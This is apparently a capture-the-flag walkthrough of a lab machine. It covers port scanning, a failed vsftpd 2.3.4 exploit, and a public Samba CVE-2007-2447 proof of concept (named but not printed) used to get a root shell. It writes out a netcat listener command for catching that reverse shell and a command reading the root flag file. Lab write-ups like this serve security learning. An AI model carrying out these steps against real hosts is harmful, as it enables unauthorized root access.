Enumeration
Lets kick off with a port scan to get a better idea of our target. There are a couple of interesting finds here. So lets start digging!
FTP - port 21
FTP Exploit attempt
FTP allows for anonymous login but nothing seems to be in the hosted file server
Looking into the detected software vsftpd 2.3.4 with searchsploit reviles these two known exploits
These however, when I try to execute the exploit, don’t seem to execute successfully. Which is a bummer but lets move on to the other ports.
SMB - port 129, 445
Performing a deeper inspection of the open SMB ports we are able to determine the software version. There are a number of known exploits when we dig into searchsploit for this version of Samba. I’m intentionally not using metasploit but we can look for a PoC for cve-2007-2447.
We find this GitHub gem to do all the heavy lifting for us. Reviewing the code it is a perfect python reproduction of the metasploit exploit! Love you amriunix <3
Exploitation
Lets prep for running the python script
pyhton3 -m venv venv
source venv/bin/activate
pip install pysmb
And prepare our netcat listener
nc -nlvp 1234
Now we run the exploit python script and pray to the tech gods that it works.
Looking at our listener we go shell baby and a root shell at that!
The root flag can be found at
cat /root/root.txt
Funnily enough it was harder for me to find the user flag. But a cheeky find script did the trick.
And that’s a wrap folks. Now go touch some grass but first look at my achievement thing!